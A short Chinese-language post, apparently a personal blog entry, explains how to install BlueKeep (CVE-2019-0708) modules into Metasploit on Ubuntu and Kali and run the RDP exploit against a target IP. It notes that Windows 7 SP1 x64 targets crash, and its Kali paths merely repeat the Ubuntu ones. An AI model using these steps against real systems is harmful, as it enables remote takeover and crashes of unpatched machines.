一大早起来就被这波exp,刷了屏,自己也想试试。
下载或复制4个文件:
配置
- ubuntu 16.04 配置 /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
- kali 配置 /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
利用过程:
- msf5 > reload_all
- msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- msf5 > set rhosts <ip_addr>
- msf5 > set target 2
- msf5 >exploit
TIP
目前对winds7 sp1 x64 系统一直出现蓝屏,exp不稳定,还不知缘由...